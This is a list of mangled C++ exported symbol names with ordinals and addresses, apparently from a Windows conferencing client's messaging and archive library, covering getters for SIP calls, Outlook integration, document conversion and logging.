              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@HHHHV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28490x419b50
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HH@Archive@Cmm@@QAEAAHXZ28500x419400
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28510x418190
              ?GetItem7@?$CmmMessageTemplate_7@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@H@Archive@Cmm@@QAEAAHXZ28520x419400
              ?GetItem7@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@IV12@V12@HH@Archive@Cmm@@QAEAAHXZ28530x41f260
              ?GetItem7@?$CmmMessageTemplate_7@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28540x419400
              ?GetItem7@?$CmmMessageTemplate_7@_JV?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28550x418190
              ?GetItem8@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@HV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28560x41afc0
              ?GetItem8@?$CmmMessageTemplate_8@HHHV?$CStringT@_W@Cmm@@V12@V12@V12@H@Archive@Cmm@@QAEAAHXZ28570x4212f0
              ?GetItem8@?$CmmMessageTemplate_8@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28580x418190
              ?GetItem8@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@IIII@Archive@Cmm@@QAEAAIXZ28590x41afc0
              ?GetItem8@?$CmmMessageTemplate_8@IV?$CStringT@_W@Cmm@@V12@V12@V12@_JV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28600x426ca0
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28610x4181c0
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@HIIV12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28620x4212f0
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IHIHV12@H_K@Archive@Cmm@@QAEAA_KXZ28630x419b80
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@II_JI@Archive@Cmm@@QAEAAIXZ28640x422ea0
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JH@Archive@Cmm@@QAEAAHXZ28650x426240
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@HHHHV12@H@Archive@Cmm@@QAEAAHXZ28660x41afc0
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28670x425a90
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28680x4181c0
              ?GetItem8@?$CmmMessageTemplate_8@V?$CStringT@_W@Cmm@@_J_JV12@V12@V12@HH@Archive@Cmm@@QAEAAHXZ28690x419430
              ?GetItem8@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@IV12@V12@HH_J@Archive@Cmm@@QAEAA_JXZ28700x41f290
              ?GetItem8@?$CmmMessageTemplate_8@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28710x419c00
              ?GetItem9@?$CmmMessageTemplate_9@IHV?$CStringT@_W@Cmm@@_JV?$CStringT@D@2@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28720x41a080
              ?GetItem9@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@H@Archive@Cmm@@QAEAAHXZ28730x4181f0
              ?GetItem9@?$CmmMessageTemplate_9@V?$CStringT@D@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28740x4181f0
              ?GetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IHIHV12@H_KH@Archive@Cmm@@QAEAAHXZ28750x419bb0
              ?GetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@IV12@V12@V12@_J_JHH@Archive@Cmm@@QAEAAHXZ28760x426270
              ?GetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@HHV12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28770x41a080
              ?GetItem9@?$CmmMessageTemplate_9@V?$CStringT@_W@Cmm@@V12@V12@V12@V12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@_W@3@XZ28780x4181f0
              ?GetItem9@?$CmmMessageTemplate_9@_JV?$CStringT@D@Cmm@@V12@_JV12@V12@V12@V12@V12@@Archive@Cmm@@QAEAAV?$CStringT@D@3@XZ28790x420a80
              ?GetLeafItem@CCmmArchiveTreeNode@Archive@Cmm@@UAEPAVCCmmArchiveVarivant@3@ABVCCmmArchivePath@3@@Z28800x458890
              ?GetLen@CmmInternelMsg@Cmm@@UBEIXZ28810x416e70
              ?GetLength@?$CStringT@D@Cmm@@QBEIXZ28820x403ad0
              ?GetLength@?$CStringT@_W@Cmm@@QBEIXZ28830x403ad0
              ?GetLineNum@XMLAttribute@tinyxml2@@QBEHXZ28840x454360
              ?GetLineNum@XMLNode@tinyxml2@@QBEHXZ28850x405070
              ?GetLocalTm@CTime@Cmm@@QBEXAAUtm@@@Z28860x411df0
              ?GetLogFilePath@logging@@YA?AV?$basic_string@_WU?$char_traits@_W@std@@V?$allocator@_W@2@@std@@XZ28870x45ddb0
              ?GetLogMessageHandler@logging@@YAP6A_NHPBDHIABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@@ZXZ28880x45e070
              ?GetMemoryUsage@CCmmPerfTelemetry@@SAHAAH0@Z28890x467820
              ?GetMinLogLevel@logging@@YAHXZ28900x45dfa0
              ?GetMinute@CTime@Cmm@@QBEHXZ28910x402320
              ?GetMinuteOfHour@CSeconds@Cmm@@QBE_JXZ28920x411a20
              ?GetMinutes@CSeconds@Cmm@@QBE_JXZ28930x411a10
              ?GetModuleFileNameW@CFileName@Cmm@@QAEXPAUHINSTANCE__@@@Z28940x4023b0
              ?GetModuleFilePath@CFileName@Cmm@@QAEXPAUHINSTANCE__@@@Z28950x4023e0
              ?GetModuleLoader@Cmm@@YAPAVICmmModuleLoader@1@XZ28960x457e60
              ?GetModuleRegistry@Cmm@@YAPAVICmmModuleRegistry@1@XZ28970x46cbe0
              ?GetMonth@CTime@Cmm@@QBEHXZ28980x4022e0
              ?GetMsgType@CmmInternelMsg@Cmm@@UBEHXZ28990x44bcc0
              ?GetNakedGUID@CmmGUID@Cmm@@AAE?AV?$CStringT@_W@2@ABV32@@Z29000x4709c0
              ?GetName@CCmmArchivePackageTree@Archive@Cmm@@QBEABV?$CStringT@_W@3@XZ29010x4043c0
              ?GetName@CCmmArchiveTreeNode@Archive@Cmm@@UAEABV?$CStringT@_W@3@XZ29020x458880
              ?GetName@CFileName@Cmm@@QBEPB_WXZ29030x412420
              ?GetNextSibling@CCmmArchiveTreeNode@Archive@Cmm@@UAEPAVICmmArchiveObject@3@ABV?$CStringT@_W@3@@Z29040x458ac0
              ?GetNode@CCmmArchiveTreeNode@Archive@Cmm@@IAEPAV123@ABVCCmmArchivePath@3@@Z29050x458a60
              ?GetObjectW@CCmmArchiveVarivant@Cmm@@QBEPAVICmmRefableObject@2@XZ29060x4599c0
              ?GetPackageName@CCmmArchiveObjHelper@Cmm@@QAEABV?$CStringT@_W@2@XZ29070x452af0
              ?GetPath@CFileName@Cmm@@QBE?AV?$CFnRangeT@_W@2@H@Z29080x402360
              ?GetPathBody@CFileName@Cmm@@QBE?AV?$CFnRangeT@_W@2@H@Z29090x412460
              ?GetPlatformFile@CFile@Cmm@@QAEPAXXZ29100x40c630
              ?GetQPCDriftMicroseconds@TimeTicks@Cmm@@SA_JXZ29110x451d60
              ?GetReaderObj@CCmmArchiveObjHelper@Cmm@@QAEPAVICmmArchiveObjReader@2@XZ29120x40c640
              ?GetRoot@CCmmArchivePackageTree@Archive@Cmm@@QAEPAVCCmmArchiveTreeNode@23@XZ29130x454fc0
              ?GetSecond@CTime@Cmm@@QBEHXZ29140x402330
              ?GetSecondOfMinute@CSeconds@Cmm@@QBE_JXZ29150x411a80
              ?GetSeconds@CSeconds@Cmm@@QBE_JXZ29160x411a70
              ?GetSiblingModuleFileName@CFileName@Cmm@@QAEXPB_WPAUHINSTANCE__@@@Z29170x412560
              ?GetSize@BinaryValue@@QBEIXZ29180x44bcc0
              ?GetSize@CFile@Cmm@@QBE_KXZ29190x4117d0
              ?GetSize@ListValue@@QBEIXZ29200x45dc60
              ?GetStackThreshold@CCmmPerfTelemetry@@SAKXZ29210x4564d0
              ?GetStr@CmmGUID@Cmm@@QAEAAV?$CStringT@_W@2@H@Z29220x470a60
              ?GetStr@StrPair@tinyxml2@@QAEPBDXZ29230x45fc00
              ?GetString@CCmmArchiveVarivant@Cmm@@QBEPB_WXZ29240x459960
              ?GetTelemetryGUID@CCmmPerfTelemetry@@SAHAAV?$CStringT@_W@Cmm@@@Z29250x467c70
              ?GetText@XMLElement@tinyxml2@@QBEPBDXZ29260x461620
              ?GetThreadTelemetry@CCmmPerfTelemetry@@CA?AV?$shared_ptr@VThreadEvents@CCmmPerfTelemetry@@@std@@XZ29270x465200
              ?GetTickCount@CTime@Cmm@@SA?AV12@XZ29280x402280
              ?GetTime@CTime@Cmm@@QBE_JXZ29290x411a70
              ?GetTimeZoneOffsetMinutes@Cmm@@YAHXZ29300x44be00
              ?GetToWrite@CmmInternelMsg@Cmm@@QBEIXZ29310x45bd50
              ?GetTrunkItem@CCmmArchiveTreeNode@Archive@Cmm@@UAEPAVICmmArchiveObject@3@ABVCCmmArchivePath@3@@Z29320x458950
              ?GetType@Value@@QBE?AW4ValueType@1@XZ29330x40c640
              ?GetUInt32@CCmmArchiveVarivant@Cmm@@QBEIXZ29340x459960
              ?GetUInt64@CCmmArchiveVarivant@Cmm@@QBE_KXZ29350x4599a0
              ?GetUserData@XMLNode@tinyxml2@@QBEPAXXZ29360x454490
              ?GetValueFromSlot@ThreadLocalPlatform@internal@Cmm@@SAPAXAAK@Z29370x45f240
              ?GetVersion@CCmmArchivePackageTree@Archive@Cmm@@QAEHXZ29380x417010
              ?GetVlogLevelHelper@logging@@YAHPBDI@Z29390x45dfd0
              ?GetVlogVerbosity@logging@@YAHXZ29400x45dfb0
              ?GetWritePos@CmmInternelMsg@Cmm@@QBEPBEXZ29410x45bd70
              ?GetWritterObj@CCmmArchiveObjHelper@Cmm@@QAEPAVICmmArchiveObjWritter@2@XZ29420x40c630
              ?GetYear@CTime@Cmm@@QBEHXZ29430x4022c0
              ?Get_Accept@CSBMBMessage_VTLSConfirm@@QAEAAHXZ29440x4181f0
              ?Get_Ack@CSBMBMessage_IGotIt@@QAEAAV?$CStringT@_W@Cmm@@XZ29450x40c930
              ?Get_Ack@CSBMBMessage_NotifyReceivedSelectMe@@QAEAAV?$CStringT@_W@Cmm@@XZ29460x40c930
              ?Get_Action@CSBMBMessage_AddClientLog@@QAEAAIXZ29470x40c930
              ?Get_ActionSource@CSBMBMessage_AddClientLog@@QAEAAIXZ29480x419400
              ?Get_ActionType@CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAEAAHXZ29490x417570
              ?Get_Active@CSBMBMessage_Assistant_SIP_WMIActive@@QAEAAHXZ29500x40c930
              ?Get_AdapterName@CSBMBMessage_NotifyNetworkSwitch@@QAEAAV?$CStringT@D@Cmm@@XZ29510x417c00
              ?Get_AdditionalInfo@CSBMBMessage_UploadFeedback@@QAEAAV?$CStringT@_W@Cmm@@XZ29520x418950
              ?Get_AesIv@CSBMBMessage_Doc2ImgConvertProgress@@QAEAAV?$CStringT@_W@Cmm@@XZ29530x41c710
              ?Get_AesKey@CSBMBMessage_Doc2ImgConvertProgress@@QAEAAV?$CStringT@_W@Cmm@@XZ29540x41af70
              ?Get_Agree@CSBMBMessage_NotifyUpdateDisclaimerStatus@@QAEAAHXZ29550x418bd0
              ?Get_App@CSBMBMessage_NotifyStartAppShare@@QAEAAV?$CStringT@_W@Cmm@@XZ29560x40c930
              ?Get_AppName@CSBMBMessage_InitThread@@QAEAAV?$CStringT@D@Cmm@@XZ29570x40c930
              ?Get_AppName@CSBMBMessage_NotifyAfterInit@@QAEAAV?$CStringT@D@Cmm@@XZ29580x40c930
              ?Get_AppName@CSBMBMessage_NotifyAfterObjCreated@@QAEAAV?$CStringT@D@Cmm@@XZ29590x40c930
              ?Get_AppName@CSBMBMessage_NotifyBeforeObjDestroyed@@QAEAAV?$CStringT@D@Cmm@@XZ29600x40c930
              ?Get_AppName@CSBMBMessage_NotifyBeforeTerm@@QAEAAV?$CStringT@D@Cmm@@XZ29610x40c930
              ?Get_AppName@CSBMBMessage_TermThread@@QAEAAV?$CStringT@D@Cmm@@XZ29620x40c930
              ?Get_ArchivingOption@CSBMBMessage_ConfirmConfLeave@@QAEAA_KXZ29630x419c30
              ?Get_AudioCmdNotify@CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ29640x417c00
              ?Get_AudioCmdRequest@CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ29650x417c00
              ?Get_AudioDevType@CSBMBMessage_AudioFacilityStatus@@QAEAAHXZ29660x417c00
              ?Get_AudioDevType@CSBMBMessage_OperateAudioFacilityParam@@QAEAAHXZ29670x417c00
              ?Get_AudioOn@CSBMBMessage_CCIVideoMuteAudioRequest@@QAEAAHXZ29680x417570
              ?Get_AudioQuality@CSBMessage_Assistant_AudioQualityNotification@@QAEAAIXZ29690x40c930
              ?Get_B64PBUserProfile@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@D@Cmm@@XZ29700x419ff0
              ?Get_B64PZRUserProfile@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@D@Cmm@@XZ29710x41a0b0
              ?Get_B64String@CSBMBMessage_UpdateLaunchConfParam@@QAEAAV?$CStringT@D@Cmm@@XZ29720x40c930
              ?Get_BandwidthInfo@CSBMBMessage_NotifyBandwidthLimitUpdate@@QAEAAV?$CStringT@D@Cmm@@XZ29730x40c930
              ?Get_BeginTime@CSBMBMessage_NotifyChangeBargeEmergencyCallStatus@@QAEAA_JXZ29740x40c930
              ?Get_BindPhoneURL@CSBMBMessage_RealNameAuthInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ29750x418390
              ?Get_Bssid@CSBMBMessage_Assistant_SIP_CheckNomadic911Request@@QAEAAV?$CStringT@D@Cmm@@XZ29760x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29770x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_JoinMeetingRequest@@QAEAAV?$CStringT@D@Cmm@@XZ29780x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29790x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_OnCallRecordingResultNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29800x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_OnCallRecordingStatusUpdateNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29810x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29820x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_OnCallTransferResultNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29830x40c930
              ?Get_CallID@CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAEAAV?$CStringT@D@Cmm@@XZ29840x417c00
              ?Get_CallID@CSBMBMessage_Assistant_SIP_UpgradeToMeetingRequest@@QAEAAV?$CStringT@D@Cmm@@XZ29850x40c930
              ?Get_CallInfo@CSBMBMessage_Assistant_SIP_OnCallIncomingNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29860x40c930
              ?Get_CallerID@CSBMBMessage_Assistant_SIP_CallUpdateKeyValueNotificationWithCallID@@QAEAAV?$CStringT@D@Cmm@@XZ29870x40c930
              ?Get_Callid@CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@QAEAAV?$CStringT@D@Cmm@@XZ29880x40c930
              ?Get_Callid@CSBMBMessage_Assistant_SIP_ReceiveRealtimePolicesNotification@@QAEAAV?$CStringT@D@Cmm@@XZ29890x40c930
              ?Get_Callid@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEAAV?$CStringT@D@Cmm@@XZ29900x40c930
              ?Get_Calloutnumber@CSBMBMessage_StartCallOutInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ29910x40c930
              ?Get_Cancel@CSBMBMessage_NotifyUserInputProxyAuth@@QAEAAHXZ29920x4191f0
              ?Get_ChannelId@CSBMBMessage_Audio3rdSDK_AudioCmdNotify@@QAEAAIXZ29930x40c930
              ?Get_ChannelId@CSBMBMessage_Audio3rdSDK_AudioCmdRequest@@QAEAAIXZ29940x40c930
              ?Get_ChannelId@CSBMBMessage_Client3rdSDK_SDKCmdNotify@@QAEAAIXZ29950x40c930
              ?Get_ChannelId@CSBMBMessage_Client3rdSDK_SDKCmdRequest@@QAEAAIXZ29960x40c930
              ?Get_ChannelId@CSBMBMessage_LogService_StartChannel@@QAEAAIXZ29970x40c930
              ?Get_ChannelId@CSBMBMessage_LogService_StopChannel@@QAEAAIXZ29980x40c930
              ?Get_ChannelId@CSBMBMessage_LogService_SubChannelAdd@@QAEAAIXZ29990x40c930
              ?Get_ChannelId@CSBMBMessage_LogService_SubChannelRemove@@QAEAAIXZ30000x40c930
              ?Get_CheckResult@CSBMBMessage_CheckNomadic911_Notification@@QAEAAIXZ30010x40c930
              ?Get_ClientCred@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ30020x418730
              ?Get_ClientCredExpireTime@CSBMBMessage_NotifyPTLoginInfo@@QAEAA_JXZ30030x418600
              ?Get_ClientID@CSBMBMessage_NotifyClientRegistry@@QAEAAV?$CStringT@D@Cmm@@XZ30040x40c930
              ?Get_ClientID@CSBMBMessage_NotifyClientUnRegistry@@QAEAAV?$CStringT@D@Cmm@@XZ30050x40c930
              ?Get_ClientNwsCred@CSBMBMessage_NotifyPTLoginInfo@@QAEAAV?$CStringT@_W@Cmm@@XZ30060x41a050
              ?Get_CodeDetail@CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAEAAV?$CStringT@D@Cmm@@XZ30070x418390
              ?Get_CodeDetail@CSBMBMessage_Assistant_SIP_OnCallMediaStatusUpdateNotification@@QAEAAV?$CStringT@D@Cmm@@XZ30080x418390
              ?Get_CodeDetail@CSBMBMessage_Assistant_SIP_OnRegistrarNotification@@QAEAAV?$CStringT@D@Cmm@@XZ30090x41a740
              ?Get_ConfigContent@CSBMBMessage_Assistant_ControlSystem_LoadRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30100x40c930
              ?Get_ConfigFile@CSBMBMessage_NotifyConfSelected@@QAEAAV?$CStringT@_W@Cmm@@XZ30110x417c00
              ?Get_ContactEmail@CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Request@@QAEAAV?$CStringT@D@Cmm@@XZ30120x40c930
              ?Get_ContactEmail@CSBMBMessage_Outlook_IMIntegration_GetContactInfo_Response@@QAEAAV?$CStringT@D@Cmm@@XZ30130x40c930
              ?Get_ContactEmail@CSBMBMessage_Outlook_IMIntegration_PhotoChanged_Notification@@QAEAAV?$CStringT@D@Cmm@@XZ30140x40c930
              ?Get_ContactEmail@CSBMBMessage_Outlook_IMIntegration_SelfEmail_Response@@QAEAAV?$CStringT@D@Cmm@@XZ30150x40c930
              ?Get_ContactEmail@CSBMBMessage_Outlook_IMIntegration_StartAudio_Request@@QAEAAV?$CStringT@D@Cmm@@XZ30160x40c930
              ?Get_ContactEmail@CSBMBMessage_Outlook_IMIntegration_StartChat_Request@@QAEAAV?$CStringT@D@Cmm@@XZ30170x40c930
              ?Get_ContactEmail@CSBMBMessage_Outlook_IMIntegration_StartVideo_Request@@QAEAAV?$CStringT@D@Cmm@@XZ30180x40c930
              ?Get_Content@CSBMBMessage_VDI_DiagLog_Content@@QAEAAV?$CStringT@D@Cmm@@XZ30190x417c00
              ?Get_Context@CSBMBMessage_Assistant_ControlSystem_CallDeviceSucceedNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ30200x40c930
              ?Get_ConvertContext@CSBMBMessage_Doc2ImgCancelConvertRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30210x40c930
              ?Get_ConvertContext@CSBMBMessage_Doc2ImgCancelConvertResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30220x40c930
              ?Get_ConvertContext@CSBMBMessage_Doc2ImgConvertFinish@@QAEAAV?$CStringT@_W@Cmm@@XZ30230x40c930
              ?Get_ConvertContext@CSBMBMessage_Doc2ImgConvertProgress@@QAEAAV?$CStringT@_W@Cmm@@XZ30240x40c930
              ?Get_ConvertContext@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30250x40c930
              ?Get_ConvertContext@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30260x40c930
              ?Get_CountryCode@CSBMBMessage_CCIVideoInviteByPhoneRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30270x40c930
              ?Get_CountrysJson@CSBMBMessage_CCIVideoGetSupportCountryInfoResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30280x417570
              ?Get_CurUserJson@CSBMBMessage_CCIVideoGetCurrentUserResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30290x417570
              ?Get_DALAPI@CSBMBMessage_Assistant_Broadcast_Network_Audio_Config_Proxy_Request@@QAEAA_JXZ30300x418bd0
              ?Get_DALAPI@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEAA_JXZ30310x41f290
              ?Get_DALDeviceName@CSBMBMessage_Assistant_DAL_Service_Service_Ready_Notification@@QAEAAV?$CStringT@D@Cmm@@XZ30320x4193a0
              ?Get_DeclineMessage@CSBMBMessage_NotifyMeetingCallResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30330x426ca0
              ?Get_Description@CSBMBMessage_PromptProxyAuth@@QAEAAV?$CStringT@_W@Cmm@@XZ30340x419ac0
              ?Get_DeviceID@CSBMBMessage_Assistant_ControlSystem_DoOperationRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30350x417c00
              ?Get_DeviceType@CSBMessage_Assistant_AudioDeviceUpdateNotification@@QAEAAIXZ30360x40c930
              ?Get_DisplayName@CSBMBMessage_UserUpdateName@@QAEAAV?$CStringT@_W@Cmm@@XZ30370x417f30
              ?Get_DocFilePath@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30380x417570
              ?Get_Domain@CSBMBMessage_CCIVideoSetDomainRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30390x40c930
              ?Get_DstCallid@CSBMBMessage_Assistant_SIP_MergeCallResponse@@QAEAAV?$CStringT@D@Cmm@@XZ30400x418390
              ?Get_DstLineCallId@CSBMBMessage_Assistant_LineCallMergedNotification@@QAEAAV?$CStringT@D@Cmm@@XZ30410x417570
              ?Get_EndType@CSBMBMessage_CCIVideoEndVideoNotify@@QAEAAHXZ30420x40c930
              ?Get_EndType@CSBMBMessage_CCIVideoEndVideoRequest@@QAEAAHXZ30430x40c930
              ?Get_ErrCode@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEAAHXZ30440x418730
              ?Get_ErrCode@CSBMBMessage_ConfirmConfLeave@@QAEAAIXZ30450x419ac0
              ?Get_ErrDetailCode@CSBMBMessage_CCIVideoJoinMeetingResponse@@QAEAAHXZ30460x4190a0
              ?Get_ErrorCode@CSBMBMessage_Assistant_SIP_SwitchCallToCarrierResponse@@QAEAAHXZ30470x418390
              ?Get_Event@CSBMBMessage_Assistant_SIP_AutoRecordingEvent@@QAEAAHXZ30480x417570
              ?Get_Event@CSBMBMessage_Assistant_SIP_RemoteMergerEvent@@QAEAAHXZ30490x417570
              ?Get_EventID@CSBMBMessage_NotifyAppEvent@@QAEAAIXZ30500x40c930
              ?Get_EventID@CSBMBMessage_OutlookMAPIEventChangeNotify@@QAEAAV?$CStringT@_W@Cmm@@XZ30510x417c00
              ?Get_ExternalInfo@CSBMBMessage_IPCSDK_SDKCmdNotify@@QAEAAV?$CStringT@D@Cmm@@XZ30520x417570
              ?Get_ExternalInfo@CSBMBMessage_IPCSDK_SDKCmdRequest@@QAEAAV?$CStringT@D@Cmm@@XZ30530x417570
              ?Get_FailReason@CSBMBMessage_Assistant_SIP_AudioDeviceFailNotification@@QAEAAHXZ30540x40c930
              ?Get_FailReason@CSBMBMessage_Assistant_SIP_CallOperationFailNotification@@QAEAAHXZ30550x417570
              ?Get_FailoverReason@CSBMBMessage_NotifyConferenceStatus@@QAEAAIXZ30560x418790
              ?Get_FilePrefix@CSBMBMessage_NotifyStartRecording@@QAEAAV?$CStringT@_W@Cmm@@XZ30570x419ff0
              ?Get_FirstName@CSBMBMessage_UserUpdateName@@QAEAAV?$CStringT@_W@Cmm@@XZ30580x40c930
              ?Get_Flag@CSBMBMessage_NotifyNetworkStateChanged@@QAEAAIXZ30590x417c00
              ?Get_Flags@CSBMBMessage_UpdateOpFlags@@QAEAAV?$CStringT@D@Cmm@@XZ30600x40c930
              ?Get_FreeMeetingElapsedTime@CSBMBMessage_ConfirmConfLeave@@QAEAAIXZ30610x419c00
              ?Get_FromApp@CSBMBMessage_AudioFacilityStatus@@QAEAAHXZ30620x40c930
              ?Get_FromApp@CSBMBMessage_OperateAudioFacilityParam@@QAEAAHXZ30630x40c930
              ?Get_FromApp@CSBMBMessage_OperateChatFacilityParam@@QAEAAHXZ30640x40c930
              ?Get_FromApp@CSBMBMessage_OperateScreenShareFacilityParam@@QAEAAHXZ30650x40c930
              ?Get_FromApp@CSBMBMessage_OperateVideoFacilityParam@@QAEAAHXZ30660x40c930
              ?Get_FromDevice@CSBMBMessage_CCIVideoMuteAudioRequest@@QAEAAHXZ30670x418390
              ?Get_GroupId@CSBMBMessage_LogService_StartChannel@@QAEAAIXZ30680x417c00
              ?Get_GroupId@CSBMBMessage_LogService_SubChannelAdd@@QAEAAIXZ30690x417c00
              ?Get_HasMessage@CSBMBMessage_Assistant_SIP_MessageCountChanged@@QAEAAHXZ30700x418730
              ?Get_HasZoomIM@CSBMBMessage_NotifyPTLoginInfo@@QAEAAHXZ30710x417c00
              ?Get_HostSnsType@CSBMBMessage_NotifyClaimHost@@QAEAAHXZ30720x40c930
              ?Get_IPCAction@CSBMBMessage_OutlookRequest@@QAEAAIXZ30730x417570
              ?Get_IPCAction@CSBMBMessage_OutlookResponse@@QAEAAIXZ30740x417570
              ?Get_ImageLink@CSBMBMessage_CCIVideoSetVBRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30750x40c930
              ?Get_ImgFolderPath@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30760x417f30
              ?Get_ImgFolderPath@CSBMBMessage_Doc2ImgStartConvertResponse@@QAEAAV?$CStringT@_W@Cmm@@XZ30770x419ac0
              ?Get_ImgFormat@CSBMBMessage_Doc2ImgStartConvertRequest@@QAEAAV?$CStringT@_W@Cmm@@XZ30780x417f50
              ?Get_InMeetingFlag@CSBMBMessage_ConfirmConfLeave@@QAEAA_KXZ30790x419b80
              ?Get_Information@CSBMBMessage_KeepAlive@@QAEAAV?$CStringT@_W@Cmm@@XZ30800x417570
              ?Get_IpAddr@CSBMBMessage_Assistant_SIP_SuspendToResume@@QAEAAV?$CStringT@D@Cmm@@XZ30810x417c00
              ?Get_IsBasicPlusMeeting@CSBMBMessage_ConfirmConfLeave@@QAEAAHXZ30820x419bb0
              ?Get_IsDIDNumber@CSBMBMessage_NotifyPTCallPeer@@QAEAAHXZ30830x417f30
              ?Get_IsHost@CSBMBMessage_ConfirmConfLeave@@QAEAAHXZ30840x419b50
              ?Get_IsIncomingCall@CSBMBMessage_Assistant_SIP_OnCallStatusUpdateNotification@@QAEAAHXZ30850x4198a0
              ?Get_IsLogin@CSBMBMessage_RealNameAuthInfo@@QAEAAHXZ30860x40c930
              ?Get_IsMeetingShowExtendDialog@CSBMBMessage_ConfirmConfLeave@@QAEAAHXZ30870x418190
              ?Get_IsPrivacyName@CSBMBMessage_NotifyPTCallPeer@@QAEAAHXZ30880x418ba0
